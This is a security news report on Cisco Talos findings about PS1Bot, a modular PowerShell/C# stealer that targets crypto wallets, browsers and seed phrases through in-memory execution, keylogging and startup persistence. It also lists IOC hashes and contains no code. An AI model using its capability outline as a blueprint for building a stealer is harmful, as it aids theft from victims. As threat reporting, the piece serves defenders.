Cisco Talos has identified a sophisticated new malware campaign targeting Windows systems with a multi-stage framework dubbed “PS1Bot,” which has been highly active throughout 2025.
This PowerShell and C#-based malware represents a significant evolution in information-stealing capabilities, specifically designed to target cryptocurrency wallets and sensitive financial data while maintaining stealth through in-memory execution techniques.
Advanced Modular Architecture Enables Multiple Attack Vectors
PS1Bot employs a modular design that allows attackers to deploy various specialized components based on their objectives. The framework includes modules for antivirus detection, screen capture, keylogging, information collection, and persistence establishment.
What sets PS1Bot apart is its emphasis on stealth – the malware minimizes persistent artifacts on infected systems by facilitating in-memory execution of modules without writing them to disk.
The initial infection vector leverages malvertising campaigns that direct victims to compressed archives with names designed for search engine optimization poisoning, such as “chapter 8 medicare benefit policy manual.zip” or “Counting Canadian Money Worksheets Pdf.zip.e49”.
Once executed, the malware establishes communication with command and control servers using the infected system’s drive serial number to construct unique URLs for C2 communications.
Cryptocurrency-Focused Information Theft Capabilities
The malware’s information stealer module demonstrates particularly sophisticated capabilities, targeting over 50 web browsers and numerous cryptocurrency-related browser extensions, including MetaMask, Ledger, Trust Wallet, and Coinbase.
PS1Bot also specifically hunts for locally installed cryptocurrency wallet applications such as Exodus, Electrum, and Atomic Wallet.
A notable feature is the implementation of embedded wordlists designed to identify files containing cryptocurrency wallet seed phrases and passwords.
These wordlists support multiple languages, including English and Czech variants, enabling the malware to scan file systems for sensitive information across diverse linguistic environments.
Connections to Previous Campaigns and Evolution
Security researchers have identified significant overlaps between PS1Bot and previously reported malware families. The framework shares architectural similarities with AHK Bot, particularly in C2 URL derivation methods and modular design approaches.
Additionally, infrastructure and code analysis reveals connections to the Skitnet malware family, suggesting possible shared development or operational resources.
The keylogging module employs dynamic C# compilation within PowerShell processes, using SetWindowsHookEx() to monitor keyboard and mouse events while also capturing clipboard contents. This demonstrates the malware’s comprehensive approach to data collection beyond traditional file-based theft.
PS1Bot’s persistence mechanism creates randomly-named files in system directories and establishes startup entries to maintain access across system reboots.
The ongoing development activities observed throughout 2025 indicate this is a rapidly evolving threat that security teams should monitor closely for emerging variants and enhanced capabilities.
IOCs
9304ff7136c030896973b0192c3ff02d47daaae9aa04db80a980df5c8eaffd91
5c983b71d035b05aba30778804bd6a2db6a9e00b1e186083813cf6ae513f89f6
943964e8eec89f1b8cb16c0cb813e0253529f47b60b2ecdef5afb4b0abd0d511
7377c7e3daa3c0d3cfd941c6cb0e27271dd2acbc0737c472b609861b0bf44a5f
14371c2993a31cdf39a8747a589e1eff365b7711a1d9fdfbc8b5273f397aa29e
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
.jpg?resize=1068,580&ssl=1&description=PS1Bot malware campaign - Cisco Talos has identified a sophisticated new malware campaign targeting Windows systems with a multi-stage.){kind=link}